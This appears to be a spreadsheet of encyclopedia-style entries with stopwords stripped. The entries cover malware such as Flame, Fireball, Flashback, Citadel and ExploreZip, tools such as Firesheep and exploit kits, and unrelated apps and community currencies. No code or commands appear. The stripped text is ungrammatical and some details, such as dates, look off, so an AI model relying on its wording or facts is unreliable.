bahrain watch computer science student university california, berkeley research finfisher) said finspy mobile (gamma's mobile spyware): respect desktop version finfisher, antivirus alone enough, bypassed antivirus scans". article's author sara yin, analyst magazine, predicted antivirus providers likely updated signatures detect finspy mobile.according announcements eset, finfisher finspy detected eset antivirus software "win32/belesak.d" trojan.other security vendors claim products block spyware know detect (regardless launched it), eugene kaspersky, head security company kaspersky lab, stated, detect malware regardless purpose origin". years statement eugene kaspersky 2012 description technique used finfisher evade kaspersky protection published part relevant blog code security. finfisher also made headlines past products found used authoritarian regimes opponents several middle eastern countries. also references external links media related finfisher wikimedia commons official website</t>
  </si>
  <si>
    <t>Citizen (app)</t>
  </si>
  <si>
    <t>citizen mobile sends users location-based safety alerts real time. allows users read updates ongoing reports, broadcast live video, leave comments. uses radio antennas installed major cities monitor communications, employees filtering audio generate alerts. currently available android devices cities, including york city, francisco area, baltimore, angeles, philadelphia. detroit, indianapolis, phoenix, cincinnati, chicago, minneapolis, saint paul, cleveland.developed sp0n, inc. originally called vigilante 2016, rebranded launched york march 2017. june 2020, reported five million active users. investors include sequoia capital, 8vc, ventures, founders fund, slow ventures, greycroft, capital. march 2020, citizen added covid-19 digital contact tracer safepass. controversial original form vigilante, enabler justice. history vigilante original vigilante developed sp0n, american technology incubator formed 2015 software programmer andrew frame, developed "[open] system." frame, previously started public telecommunications company ooma, inc. early advisor facebook, invested $300,000 sp0n recruited several engineers. frame idea citizen "looking backs former tenements lower manhattan. thought modern, invisible signals wireless calls, wi-fi police radio darting 19th-century buildings. vigilante backed seed round million, founders fund.the vigilante released york city, store october 2016. app, showed users crime occurring real time, went viral. proved controversial marketing videos seemed encourage user vigilantism, several publications also raising concerns racial profiling harassment. within hours store launch, apple pulled safety concerns. sp0n subsequently asserted working apple "resolve issue" still planned shipping android version. rebrand citizen with york city first test market, sp0n relaunched march 2017 citizen android. increased safety messaging discourage users approaching interfering crime scenes. while developing iteration, company consulted york city officials, police, public safety experts, "civil rights leaders—among others" making safe use. citizen sent alerts deemed threat "public safety," omitting calls suspicious people, suspicious bags, drug incidents. according company time, "there 10,000 calls york city. include 300-400 average." citizen received hostile reaction critics. they noted livestreaming option could tempt people approach danger spread unjustified panics. 2017, company said downloaded 34,000 times york city prior months. september 2017, sp0n announced raised $12.2 million series funding. round sequoia capital, valued million. other investors included ventures, slow ventures, capital. time, citizen around employees monitoring police fire calls york's five boroughs full time, around 120,000 users york. september 2017, expanded francisco, california, soon spreading service larger area.in 2018 2019, began receiving attention press, particular alerting york school principal nearby terrorist attack event reached news. according cnn, fire 2018 trump tower, simultaneous users live streamed fire blazed," shooting youtube's headquarters april 2018, "some earliest details citizen livestreams." citizen also used livestream lock-down balboa high school francisco august 2018 and, according cnn, "gained attention major incidents including evacuation cnn's headquarters december 2018 truck attack york's west side." february 2018, citizen reported 250,000 monthly active users, overall sent total 26.5 million notifications.although citizen formal relationships municipalities, february 2019, downloading mandatory york firefighters. launched baltimore, maryland february 2019 ongoing conversations elected officials members baltimore city council march 2019, launched angeles, followed philadelphia, pennsylvania, fifth market. mixed reaction police departments, writing march 2019 "since relaunched citizen 2017, many early fears faded." police departments business reached comment "neutral app," including francisco baltimore. citizen asserted emergency room doctors used citizen anticipate incoming patients, news organizations scouted breaking stories.in june 2019, bloomberg reported around million people downloaded york city, consistently ranked news apps store, "often higher cnn, buzz feed, york times google news." william bratton, opposed 2016 york city police commissioner, around time joined citizen's board directors. july 2019, citizen sent million notifications tenth downloaded news iphones, according yorker. time, citizen full time employees, including analysts, citizen's artificial intelligence software allowing single person cover incidents across multiple cities. after raising million early 2019 funding round 8vc, july 2019 company raised total million. sp0n revealed revenue model, state citizen would make profits share user information. 2019, update required continuous location tracking access app, resulting controversy. citizen response modified allow users configure privacy settings. 2020's wall street journal, early june 2020, wrote citizen become "key tool protests" police murder george floyd minneapolis. recode wrote citizen experiencing "surprising renaissance organizing broadcasting tool activists", protestors using monitor protest developments, police responses, curfews. fast company described citizen, users exactly people gathering, view video demonstrations progress, look signs rioting looting, feelings comments sections." some critics noted citizen's collection protest videos tied identifying information could potentially used government entities. response, citizen said gives user data enforcement response valid subpoenas, court orders, search warrants," users delete content, "loses access within days", though enforcement agencies undertake preserve longer. citizen became top-ranked news apple chart june 2020, 744th, surpassing twitter, cnn, news. during first week june, around 600,000 news users signed citizen.in january 2021, axios reported citizen raised million funding, greycroft investor. round included million goodwater capital march 2020.in march 2021, citizen added "activity notifications, private messaging, ability friends. around time, citizen reintroduced feature lets users create incident alerts, instead waiting incident show broadcast scanner added citizen's employees." april, citizen began sending magic moments notifications, "videos recall incidents citizen users came rescue prevented others falling victim awful tragedy."in 2021, citizen deployed vehicle private security personnel angeles intention providing on-demand private security. 2022, citizen planned trial version private security service chicago, assistance company securitas.in january 2022, citizen made first acquisition, purchasing disaster-prep harbor. harbor's weather mapping risk prediction incorporated citizen app, continue operate independently. features alerts incidents citizen generates alerts sourced fire, emergency medical services, calls, citizen employees using citizen software monitor publicly available information. specifically, maintains network proprietary radios across multiple cities, monitor public radio channels across city's first responder network: state local police, fire ems, transit airport security." citizen digitizes reports using custom artificial intelligence system, turn interpreted employees. users near report, receive push notification phone geolocates event, dot. according forbes, alerts "contain brief description, exact address distance user. with tap, notification expands street map, detail, plus user comments." with detail added incidents progress, alerts include live video. home screen organizes nearby incidents distance recency, citizen also allows users alerts anything major events. some alerts non-emergencies, large crowds blocked-off streets.the company employees screen communications, main criteria inclusion information "needs pose public safety concern." operations team includes journalists former first responders, "trained make on-the-fly decisions goes based complex criteria." policy, incidents suspicious persons, commercial burglaries, minor collisions, medical issues included; changes largely reaction fears vigilante, citizen's original form, would encourage over-reporting innocent people suspicious. user content "ensure graphic images," citizen's moderators review uploaded photos videos, filtering graphic images comments derogatory, racist, explicit." users close incident, "record" button appears screen allow live-streaming. users paid videos, "nor videos gamified rankings 'likes'." march 2019, around 100,000 live videos recorded using app. york times reported citizen footage provided television stations free, videos used local news broadcasts weekly basis. safepass march 2020, citizen introduced digital contact tracing system, though launch delayed months frame awaited apple's approval, concerns combined bluetooth violate user privacy; compromise reached launching additional safepass app. that august safepass went public, featured emily chang's bloomberg technology show. with 700,000 people tested product 10,000 covid-19 test results reported test group, citizen called "the largest private contact-tracing network." made available store google play, functionality android.on august 2020, stockton, california joaquin county partnered citizen promoting safepass. stockton mayor michael tubbs stated "hoping many 750,000 county residents possible signed soon possible order reach critical mass." september 2020, angeles county, including angeles, long beach, pasadena, announced partnering safepass "bolster county's contact tracing initiative receive info opt-in basis." frame stated million county's million citizens already used citizen, 3.5% previously opted safepass limited beta release. onair april 2021, citizen debuted onair, cable news-style livestream host discuss ongoing events conduct interviews scene event. month later, livestream million views started search california, offering $30,000 reward information specific person's arrest, claiming arsonist responsible palisades fire. while police indeed looking person, innocent, another person since arrested. citizen spokesperson called incident mistake taking seriously." citizen protect august 2021, citizen released subscription security feature protect. citizen's first paid feature, today says "lets users contact virtual agents help feel they're danger." feature earlier beta-tested 100,000 users. january 2022, protect 100,000 subscribers. criticism citizen criticized "voyeuristic" addition substantially increasing saturation surveillance larger cities, especially neighborhoods large minority population. also list photo video apps list free open-source android applications list free open-source applications messaging apps neighbors (app) nextdoor references</t>
  </si>
  <si>
    <t>Fireball (software)</t>
  </si>
  <si>
    <t>fireball browser hijacking malware discovered security company check point. takes target browsers turns zombies. discovery check point claims discovered fireball malware 2017 microsoft claims tracking malware since 2015. authorship malware tracked chinese company called rafotech. they digital marketing agency based beijing. they bundling legitimate software provide users. some programs rafotech bundled fireball software deal wifi, mustang browser, sosodesk image viewer.rafotech claims million users (similar estimated number infections) worldwide denies uses fake search engines. security researchers dispute claim, noting rafotech also purchased additional distribution means threat actors. their fake search engines popular ranked among 10,000 websites reaching 1,000. inner workings malware ability running code victim computers, downloading arbitrary file hijacking manipulating infected user's traffic order generate advertisement revenue. installs plugins additional configurations boost advertisements, potential turn distributor additional malware. malware spread mostly bundling. installed victim's machine alongside wanted program, often without user's consent. digital marketing agency rafotech indicated producer software. company accused host fake search engines, redirect queries yahoo.com google.com. fake search engines include tracking pixels used collect private information users. fireball manipulates infected browsers turn default search engines home pages above-mentioned fake search engines, enable software users infected browsers. fireball malware conform usual characteristics bundled software. check point asserts, “the malware fake search engines don’t carry indicators connecting rafotech, cannot uninstalled ordinary user conceal true nature.” furthermore, fireball “displays great sophistication quality evasion techniques, including anti-detection capabilities, multilayer structure flexible c&amp;c.”another deception legitimate-seeming digital certificates. rafotech's fake search engines malware carry identifying marks.the program capability arbitrary code, download applications harvest sensitive information, banking medical details. cyber criminals could leverage source code create types malware. infections estimated million computers infected worldwide. check point researches also claim malware might infected computers corporate networks, making high volume internet threat. according source, highest infection rates discovered indonesia, india brazil. speculated related browser hijackers operations form possibly largest infection operation history.table countries infected fireball malware there dispute numbers according microsoft, tracking malware since 2015. results based fireball infections cleaned windows defender malicious software removal tool. based collected data total infections million. check point researchers used number visits malware-carrying search pages device itself. references</t>
  </si>
  <si>
    <t>Firefox Lockwise</t>
  </si>
  <si>
    <t>firefox lockwise deprecated password manager firefox browser, well mobile operating systems android. desktop, lockwise simply part firefox, whereas android available standalone app. firefox sync activated (with firefox account), lockwise synced passwords firefox installations across devices. also featured built-in random password generator. application branding since "phased out." history developed mozilla, originally named firefox lockbox 2018. renamed "lockwise" 2019. introduced july 2018 part test pilot program. march 2019, released android.on desktop, lockwise started browser addon. alphas released march august 2019. since firefox version lockwise integrated browser (accessible about:logins), replaced basic password manager presented popup window. support mozilla ended support firefox lockwise december 2021. day, longer available google play store apple store install update. also list password managers references external links official website</t>
  </si>
  <si>
    <t>Firefox Monitor</t>
  </si>
  <si>
    <t>firefox monitor online service developed mozilla, announced june 2018 launched september year. informs users email address passwords used leaked data breaches, using database provided have pwned? (hibp) working hibp's creator, troy hunt. further reading nguyen, nick september 2018). "introducing firefox monitor, helping people take control after data breach". mozilla blog. retrieved july 2019. references</t>
  </si>
  <si>
    <t>Firesheep</t>
  </si>
  <si>
    <t>firesheep extension firefox browser used packet sniffer intercept unencrypted session cookies websites facebook twitter. plugin eavesdropped wi-fi communications, listening session cookies. when detected session cookie, tool used cookie obtain identity belonging session. collected identities (victims) displayed side firefox. clicking victim's name, victim's session taken attacker.the extension released october 2010 demonstration security risk session hijacking vulnerabilities users sites encrypt login process cookie(s) created login process. warned extension capture login details without permission would violate wiretapping laws and/or computer security laws countries. despite security threat surrounding firesheep, representatives mozilla add-ons stated initially would browser's internal add-on blacklist disable firesheep, blacklist used disable spyware add-ons inadvertently create security vulnerabilities, opposed attack tools (which legitimately used test security one's systems). since then, firesheep removed firefox addon store. similar tool called faceniff released android mobile phones. also session hijacking cookie hijacking https transport layer security http strict transport security references external links firesheep home page eric butler york times article firesheep</t>
  </si>
  <si>
    <t>Citadel (malware)</t>
  </si>
  <si>
    <t>citadel piece massively-distributed malware based upon zeus. targets credentials stored password managers keepass, password safe nexus personal security client.by 2017 first identified 2011) citadel infected million computers worldwide caused $500 million losses.on march 2017, extradited norway united states, russian computer science professional mark vartanyan pleaded guilty computer fraud charge part developing control panel citadel. july 2017, sentenced years federal prison. also conficker command control (malware) gameover zeus, successor zeus operation tovar timeline computer viruses worms tiny banker trojan torpig zeus (malware) zombie (computer science) references</t>
  </si>
  <si>
    <t>Circle (company)</t>
  </si>
  <si>
    <t>circle peer-to-peer payments technology company. founded jeremy allaire sean neville october 2013. circle's mobile payment platform, circle pay, allows users hold, send, receive traditional fiat currencies. september 2015, circle received first bitlicense issued york state department financial services. april 2016, british government approved first virtual currency licensure circle. circle headquartered boston, massachusetts.up december 2016, circle also operated bitcoin wallet service sell bitcoins. since ceased provide service, claiming company ever consumer bitcoin exchange, continue focus resources global social payments future next-generation blockchain technology".in february 2020, circle sold digital asset trading platform voyager digital.in july 2021, circle announced plan merge special-purpose acquisition company called concord acquisition corp. public, deal values company billion.circle issuer usdc stablecoin.on july 2022, matt taibbi released extremely critical overview circle's business practices article titled "the financial bubble comes full circle." funding company received us$135 million venture capital rounds investments 2013 2016, including us$50 million goldman sachs. april 2015 york times reporter nathaniel popper wrote goldman sachs investment "should help solidify bitcoin’s reputation technology serious financial firms work with." june 2016, circle raised us$60 million series funding backed existing partners. 2018, circle raised us$110 million venture capital create coin, ethereum coin claim backed usd. services features 2015 circle account funded "us-issued visa mastercard credit debit cards", bank accounts. 2016, european customers also circle gbp. circle plans conversion rate dollar. britain's financial conduct authority granted circle electronic money license april 2016, expanding circle's services united kingdom broadening circle's relationship bank barclays. june 2016, circle announced begin expanding services china, jeremy allaire believes "there’s opportunity chinese consumers want share value globally friends parts world."in december 2016 circle stopped supporting exchange bitcoin still allows money transfers. october 2017, circle launched service group payments cash transfers accounts. june 2019 announced circle mobile apps would discontinued september acquisitions february 2018, circle announced purchased poloniex cryptocurrency exchange $400 million. amid developments around acquisition, circle's leaked documents detailing plans operating poloniex revealed company's moves become "the us's first regulated crypto exchange" supported mutual understanding sec. while circle announced exchange would "spin out" october 2019, revealed month later justin sun, founder tron, acquisition poloniex. october 2018 seedinvest announced entered agreement sell circle, subject finra (financial industry regulatory authority) approval. investments november 2021 circle $13.5m funding round crowdfunding platform crowdcube. references external links official website</t>
  </si>
  <si>
    <t>FitGirl Repacks</t>
  </si>
  <si>
    <t>fitgirl repacks website distributing pirated video games. fitgirl repacks known "repacking" games compressing significantly downloaded shared efficiently. torrentfreak listed fitgirl repacks sixth 2021 ninth 2020's most popular torrent sites lists.fitgirl repacks crack games, instead using existing game installers pirated game files like releases warez scene repacking significantly smaller download size. repacked games, usually limited microsoft windows, distributed using file hosting services bittorrent. download instructions information releases posted fitgirl repacks blog website three torrent directories: 1337x, rutor tapochek. fitgirl repacks based latvia. history 2012, started compressing game files personal released geometry wars dimensions's repack first time russian trackers. references</t>
  </si>
  <si>
    <t>Flame (malware)</t>
  </si>
  <si>
    <t>flame, also known flamer, skywiper, skywiper, modular computer malware discovered 2012 attacks computers running microsoft windows operating system. program used targeted cyber espionage middle eastern countries.its discovery announced 2012 maher center iranian national computer emergency response team (cert), kaspersky crysys budapest university technology economics. last stated report flame certainly sophisticated malware encountered practice; arguably, complex malware ever found." flame spread systems local network (lan). record audio, screenshots, keyboard activity network traffic. program also records skype conversations turn infected computers bluetooth beacons attempt download contact information nearby bluetooth-enabled devices. this data, along locally stored documents, sent several command control servers scattered around world. program awaits instructions servers.according estimates kaspersky 2012, flame initially infected approximately 1,000 machines, victims including governmental organizations, educational institutions private individuals. time infections happened iran, israel, palestine, sudan, syria, lebanon, saudi arabia, egypt, "huge majority targets" within iran. flame also reported europe north america. flame supports "kill" command wipes traces malware computer. initial infections flame stopped operating public exposure, "kill" command sent.flame linked equation group kaspersky lab. however, costin raiu, director kaspersky lab's global research analysis team, believes group cooperates creators flame stuxnet position superiority: "equation group definitely masters, giving others, maybe, bread crumbs. from time time giving goodies integrate stuxnet flame."in 2019, researchers juan andres guerrero-saade silas cutler announced discovery resurgence flame. attackers used 'timestomping' make samples look like created 'suicide' command. however, compilation error included real compilation date (circa 2014). version (dubbed 'flame 2.0' researchers) includes encryption obfuscation mechanisms hide functionality. history flame (a.k.a. flame) identified 2012 maher center iranian national cert, kaspersky crysys (laboratory cryptography system security) budapest university technology economics kaspersky asked united nations international telecommunication union investigate reports virus affecting iranian ministry computers. kaspersky investigated, discovered hash filename appeared customer machines middle eastern nations. after discovering pieces, researchers dubbed program "flame" main modules inside toolkit [frog.defaultattacks.a-installflame].according kaspersky, flame operating wild since least february 2010. crysys reported file name main component observed early december 2007. however, creation date could determined directly, creation dates malware's modules falsely dates early 1994.computer experts consider cause attack april 2012 caused iranian officials disconnect terminals internet. time iranian students news agency referred malware caused attack "wiper", name given malware's creator. however, kaspersky believes flame separate infection entirely" wiper malware. size complexity program—described "twenty times" complicated stuxnet—the stated full analysis could require long years.on may, iran's cert announced developed detection program removal tool flame, distributing "select organizations" several weeks. after flame's exposure news media, symantec reported june flame command control (c&amp;c) computers sent "suicide" command infected remove traces flame.according estimates kaspersky 2012, initially flame infected approximately 1,000 machines, victims including governmental organizations, educational institutions private individuals. time countries affected iran, israel, palestinian territories, sudan, syria, lebanon, saudi arabia, egypt. sample flame malware available github operation flame uncharacteristically large program malware megabytes. written partly scripting language compiled code linked allows attack modules loaded initial infection. malware uses five different encryption methods sqlite database store structured information. method used inject code various processes stealthy, malware modules appear listing modules loaded process malware memory pages protected read, write execute permissions make inaccessible user-mode applications. internal code similarities malware, exploits security vulnerabilities used previously stuxnet infect systems. malware determines antivirus software installed, customises behaviour (for example, changing filename extensions uses) reduce probability detection software. additional indicators compromise include mutex registry activity, installation fake audio driver malware uses maintain persistence compromised system.flame designed deactivate automatically, supports "kill" function makes eliminate traces files operation system receipt module controllers.flame signed fraudulent certificate purportedly microsoft enforced licensing intermediate certificate authority. malware authors identified microsoft terminal server licensing service certificate inadvertently enabled code signing still used weak hashing algorithm, produced counterfeit copy certificate used sign components malware make appear originated microsoft. successful collision attack certificate previously demonstrated 2008, flame implemented variation chosen-prefix collision attack. deployment like previously known cyber weapons stuxnet duqu, employed targeted manner evade current security software rootkit functionality. once system infected, flame spread systems local network stick. record audio, screenshots, keyboard activity network traffic. program also records skype conversations turn infected computers bluetooth beacons attempt download contact information nearby bluetooth enabled devices. this data, along locally stored documents, sent several command control servers scattered around world. program awaits instructions servers.unlike stuxnet, designed sabotage industrial process, flame appears written purely espionage. appear target particular industry, rather complete attack toolkit designed general cyber-espionage purposes".using technique known sinkholing, kaspersky demonstrated huge majority targets" within iran, attackers particularly seeking autocad drawings, pdfs, text files. computing experts said program appeared gathering technical diagrams intelligence purposes.a network servers across asia, europe north america used access infected machines remotely. origin june 2012, washington post published article claiming flame jointly developed u.s. national security agency, israel's military least five years prior. project said part classified effort code-named olympic games, intended collect intelligence preparation cyber-sabotage campaign aimed slowing iranian nuclear efforts.according kaspersky's chief malware expert, "the geography targets also complexity threat leaves doubt nation-state sponsored research went it." kaspersky initially said malware bears resemblance stuxnet, although parallel project commissioned attackers. after analysing code further, kaspersky later said strong relationship flame stuxnet; early version stuxnet contained code propagate drives nearly identical flame module exploits zero-day vulnerability.iran's cert described malware's encryption special pattern coming israel". daily telegraph reported flame's apparent targets—which included iran, syria, west bank—israel became "many commentators' prime suspect". other commentators named china u.s. possible perpetrators. richard silverstein, commentator critical israeli policies, claimed confirmed "senior israeli source" malware created israeli computer experts. jerusalem post wrote israel's vice prime minister moshe ya'alon appeared hinted government responsible, israeli spokesperson later denied implied. unnamed israeli security officials suggested infected machines found israel imply virus could traced u.s. western nations. u.s. officially denied responsibility.a leaked document mentions dealing iran's discovery flame gchq jointly-worked event. also cyber electronic warfare cyber security standards cyberterrorism operation high roller notes references</t>
  </si>
  <si>
    <t>Flashback (Trojan)</t>
  </si>
  <si>
    <t>osx.flashback, also known flashback trojan, fakeflash, trojan backdoor.flashback, trojan horse affecting personal computer systems running first variant flashback discovered antivirus company intego september 2011. infection according russian antivirus company web, modified version "backdoor.flashback.39" variant flashback trojan infected 600,000 computers, forming botnet included bots located cupertino, california. findings confirmed later another computer security firm, kaspersky lab. this variant malware first detected april 2012 finland-based computer security firm f-secure. estimated early april 2012, 56.6% infected computers located within united states, 19.8% canada, 12.8% united kingdom 6.1% australia. details original variant used fake installer adobe flash player install malware, hence name "flashback".a later variant targeted java vulnerability system infected user redirected compromised bogus site, javascript code caused applet containing exploit load. executable file saved local machine, used download malicious code remote location. malware also switched various servers optimized load balancing. each given unique sent control server. trojan, however, would infect user visiting infected page, meaning users computer infected unless user accounts infected separately. resolution oracle, company develops java, fixed vulnerability exploited install flashback february 2012. however, time flashback's release, apple maintained version java release update containing april 2012, flaw already exploited install flashback 600,000 macs. april 2015, company issued update remove common flashback variants. updated java release made available lion snow leopard; removal utility released intel versions leopard addition newer operating systems. users older operating systems advised disable java. there also third party programs detect remove flashback trojan. apple worked process would eventually lead release java runtime environment (jre) time would available windows, linux, solaris users. january 2014, 22,000 macs still infected flashback trojan. also defender leap (computer worm) references external links apple delays, hackers play april 2012</t>
  </si>
  <si>
    <t>Flex dollar</t>
  </si>
  <si>
    <t>flex dollars form payment used large institutions, especially universities. georgetown university, james madison university, university toronto, saint mary's university, queen's university, university waterloo, mcmaster university, university western ontario, university ottawa, university utah, messiah college schools system. flex dollars common tender, rather scrip local currency used purchase items food, snacks, school supplies. insurance, flex dollars used assign values employee's benefits. employee instead deductible certain percentage coverage assigned pool flex dollars assign required. obvious advantage ability assign much larger amount coverage area covered another world. also money external links flex dollar program muhlenberg college</t>
  </si>
  <si>
    <t>ExploreZip</t>
  </si>
  <si>
    <t>explorezip (also known i-worm.zippedfiles) destructive computer worm attacks machines running microsoft windows. first discovered israel june 1999. worm contains malicious payload, utilizes microsoft outlook, outlook express, exchange mail replying unread messages user's inbox. worm also searches mapped drives networked computers windows installations. found, copies windows folder remote computer modifies win.ini file infected computer. january 2003, symantec discovered packed variant threat exhibits characteristics. distribution worm distributed form e-mail words:hi received email shall send reply asap. till then, take look attached zipped docs. payload message includes attachment name zipped_files.exe. opened, dialog appears windows resembling normally appearing opening corrupted archive, worm copies onto machine's hard drive. also modifies win.ini file (windows windows registry (windows re-executes reboot. worm looks copy microsoft outlook mail people user's address book. destroys microsoft office documents, c++, assembly language source files user's hard drive overwriting zero-byte files. references external links worm.explorezip symantec.com explorezip worm computer incident advisory capability department energy)</t>
  </si>
  <si>
    <t>Exploit kit</t>
  </si>
  <si>
    <t>exploit tool used automatically managing deploying exploits target computer. exploit kits allow attackers deliver malware without advanced knowledge exploits used. browser exploits typically used, although also include exploits targeting common software, adobe reader, operating system itself. most kits written php.exploit kits often sold black market, standalone kits, service. history some first exploit kits webattacker mpack, created 2006. they sold black markets, enabling attackers exploits without advanced knowledge computer security.the blackhole exploit released 2010, could either purchased outright, rented fee. malwarebytes stated blackhole primary method delivering malware 2012 much 2013. after arrest authors late 2013, sharply declined.neutrino first detected 2012, used number ransomware campaigns. exploited vulnerabilities adobe reader, java runtime environment, adobe flash. following joint-operation cisco talos godaddy disrupt neutrino malvertising campaign, authors stopped selling kit, deciding provide support updates previous clients. despite this, development continued, exploits added. april 2017, neutrino activity ceased. june 2017, f-secure tweeted "r.i.p. neutrino exploit kit. we'll miss (not)." graph showing complete decline neutrino detections.from 2017 onwards, usage exploit kits dwindled. there number factors caused this, including arrests cybercriminals, improvements security making exploitation harder, cybercriminals turning method malware delivery, microsoft office macros social engineering. overview exploitation process general process exploitation exploit follows: victim navigates website infected exploit kit. links infected pages spread spam, malvertising, compromising legitimate sites. victim redirected landing page exploit kit. exploit determines vulnerabilities present, exploit deploy target. exploit deployed. successful, payload attacker's choosing (i.e. malware) deployed target. features exploit kits employ variety evasion techniques avoid detection. some techniques include obfuscating code, using fingerprinting ensure malicious content delivered likely targets.modern exploit kits include features interfaces statistics, tracking number visitors victims. also references</t>
  </si>
  <si>
    <t>Exploit as a service</t>
  </si>
  <si>
    <t>exploit service eaas scheme cybercriminals whereby zero-day vulnerabilities leased hackers. eaas typically offered cloud service. 2021, eaas became trend among ransomware groups.in past, zero-day vulnerabilities often sold dark web, usually high prices, millions dollars zero-day. leasing model makes vulnerabilities affordable many hackers. even zero-day vulnerabilities later sold high prices, leased time.the scheme compared similar schemes like ransomware service (raas), phishing service hacking service (haas). latter includes services ddos botnets maintained hackers services. parties offer exploit-as-a-service need address various challenges. payment usually done cryptocurrencies like bitcoin. anonymity always guaranteed cryptocurrencies used, police able seize criminals various occasions. zero vulnerabilities leased could discovered software used exploit could reverse engineered. uncertain profitable exploit-as-a-service business model turns profitable, probably amount threat actors offer service increase. sources information exploit-as-a-service include discussions dark web, reveal increased interest kind service. also exploit (computer security) computer security computer virus crimeware exploit risk metasploit shellcode w3af notes external links media related computer security exploits wikimedia commons exploit-as-a-service: cybercriminals exploring potential leasing zero-day vulnerabilities saved internet archive exploit-as-a-service, high rollers zero-day criminal tactics saved internet archive hacking service saved internet archive</t>
  </si>
  <si>
    <t>Community HeroCard</t>
  </si>
  <si>
    <t>community herocard (chc), introduced minneapolis, minnesota 1998, community currency uses debit cards. program collaboration local residents, non-profit organizations (npo), businesses, local government invigorate local economy community. residents application dollars, volunteer participating npo, earn community service dollars (c$d) hour, credited card. participating stores agree contribute price purchase. member makes purchase, store unconditionally refunds commitment member; another refunded community service dollars used, contributed npos not. remaining contributed npos program. addition, cents charged card use. community service dollars must spent within days automatically contributed npos. august 1999, participants included 2,100 individuals, npos, businesses. hero card patented invention. invention carried business plan gary austin atlanta, georgia 1991 late 1990s. hero card tool consumers create savings wealth depositing cash rebates private account name card holder. hero cards distributed free credit card holders even preferred cash purchases. when purchase made consumer (either credit cards, debit cash), rebate would deposited hero account accrual interest. exciting concept rebates would available even cash purchasing consumers credit card users, card require credit check distribute, "deposit" reward card, credit purchase card. hero card idea pitched major credit card companies, initially excited idea, plan (though offering similar "savings reward" cards 2006) see: money central article startup stock offerings reached millions dollars herocard, company eventually closed doors local card launch atlanta garner critical mass sustain itself. external links herocard article april 1999</t>
  </si>
  <si>
    <t>EZproxy</t>
  </si>
  <si>
    <t>ezproxy proxy server used libraries give access outside library's computer network restricted-access websites authenticate users address. this allows library patrons home elsewhere library's ezproxy server gain access resources library subscribes, bibliographic databases. software originally written chris zagar 1999 founded useful utilities support oclc announced january 2008 acquired product hiring zagar full-time consultant year. zagar librarian serves systems librarian estrella mountain community college, part maricopa community colleges arizona. 2006 lita/brett butler entrepreneurship award work ezproxy.ezproxy rewriting program, works dynamically altering urls within pages provided database vendor. server names within urls pages changed reflect ezproxy server instead, causing users return ezproxy server access links pages." previous proxy solutions complex difficult maintain, ezproxy created, authentication systems like shibboleth still future.the software sometimes confused generic proxy server software designed control access. sometimes referred "proxy referral" server distinguish software purchased thousands institutions countries. references external links ezproxy authentication access software, official webpages oclc unofficial ezproxy self-support wiki, state university york potsdam customizable file analysis statistics tool universities, customizable file analysis statistics tool universities</t>
  </si>
  <si>
    <t>Community Exchange System</t>
  </si>
  <si>
    <t>community exchange system (ces) internet-based global trading network allows participants sell goods services without using national currency. described type local exchange trading system (lets) network based free software. while used alternative traditional currencies australian dollar euro south african rand, community exchange system complementary currency sense functions alongside established currencies. name coined online service started 2003 cape town, south africa, cape town talent exchange (ctte). from spread countries, biggest take-up australia, australia founded 2011. this original takes idea lets similar systems step providing means inter-community trading; global network communities using non-monetary exchange systems.the international scope. printed money coins uses computer technology serve "online money banking system" alternative exchange system marketplace. advance arrangement either good service exchanged another good service, commonly called barter, since uses digital unit value (not digital currency). background while money typically takes form national currency dollars euros, long types "currencies" ranging simple notes––in person declares debt second person written document––to sophisticated programs frequent-flyer programs points accumulated side-system result purchases. some communities, typically remote ones, instituted sometimes called community currency, sometimes paper notes, totnes pound town totnes united kingdom; idea promote local commerce "keep money circulating within town's local economy," according report.the advent internet technology made alternative (aka complementary) currencies viable, databases keep account credits facilitate trading. history system called cape town talent exchange (ctte) started february 2003 cape town ashoka fellow jenkin (also known daring prison escape apartheid era) former maths science teacher chemical engineer northcott.the abstract unit currency (unit account/value) called "talent", physical bills coins made. purpose bring advantages trading network destitute persons unable credit loans using traditional national currencies, well assist marginalised communities within city cape town, khayelitsha, become self-sustaining. initial design local moneyless not-for-profit exchange similar respects lets, record members trading goods services using locally created currency called "lets credits".the exchange later evolved complex system took advantage internet technology reduce costs administering system allowed expansion places, including areas outside borders south africa. software permitted exchange city link similar exchanges cities form global network. community exchange systems formally constituted registered not-for-profit company companies south africa 2008 known international. australia australia 2011.as march 2019 four servers hosting different communities, international cape town "global" server, another taiwan, australia hosting australian communities timebanking australia south wales. spanish system, integralces (serving argentina, brazil, france, greece, italy, spain mexico), geneva-based communityforge.net also part network. size reports vary number complementary currency exchanges linked network. report 2011 suggested network consisted linked exchanges operated different countries; second report counted number exchanges approximately different countries. estimate 2,000 members 2006 total 6,700 members groups eight countries. 2011, number participants cape town talent exchange estimated 4,000. report time suggested alternative forms money "growing popularity" places south africa elsewhere. since 2003, system initiated, half million talents traded, 500,000 south african rands, according estimate. estimate suggested total value local exchange trading systems trades worldwide billion south african rands 2004.the site reported exchange groups hosted global server start 2013. these located countries, another australian exchanges australian server. method operation person wishing join creates account particular local exchange community exchange system website. this gives access online community, sometimes described "online shopping mall" similar respects social networking website. they offer sell goods services, bought, credits accumulate, turn allows things exchange well participating sellers. generally, exchange "currency", unit measurement, serves recording mechanism keep track values transferred. most exchanges operate according principles mutual credit, time banks; even exchange-specific paper currencies portable physical record documenting electronic credit.the registered member accesses host server manages particular exchange, access enables user link exchanges. generally, fixed exchange rate community exchange system unit value national currency; rather, values fluctuate. database software keeps track persons amounts "money".the buyer "pays" seller signing trading sheet provided seller handing trading slip records much buyer agreeing debited seller goods/service delivered. slip either handed seller group administrator enter amount computerised system, information entered directly seller.generally, members allowed accumulate either much "debt" much "credit" system. when deficit builds members generally usually stop trading person person work sells items services; individual person's credit becomes extensive, members urge person begin trading bring amount. taxed like currency "nation's rules apply like national currency." particular member computer lacks internet access, possible local area coordinator enter trade system. benefits ces's stated aims march 2019 include mobilising real wealth community, fostering self-reliance self esteem, fostering social justice equality, keeping wealth created fostering sense community.advocates suggest community exchange system "means empowerment" poor people, elderly, disabled persons described underemployed. advantage cited destitute person begin earning credits working, since require person first acceptable credit history credit score qualify traditional job. regardless person's past financial situation, person's contributions exchangeable value based worthiness contribution.proponents claim essentially different traditional national currencies sense types money digital form. advocate margaret legum south african economics network claimed currency comes existence trade happens and, result, risk inflation deflation since "there thing much little money." argued superior arrangement interest charged system "transparent" everybody could everybody else's balance credits debits. "money used commodity lent borrowed kept use. contrast, supply national currencies everywhere comes existence commercial debt bank, without reference whether extra money needed match supply goods services."persons borrow take loan using system, although generally amounts large, forces pushing persons either large deficit large surplus particular account. 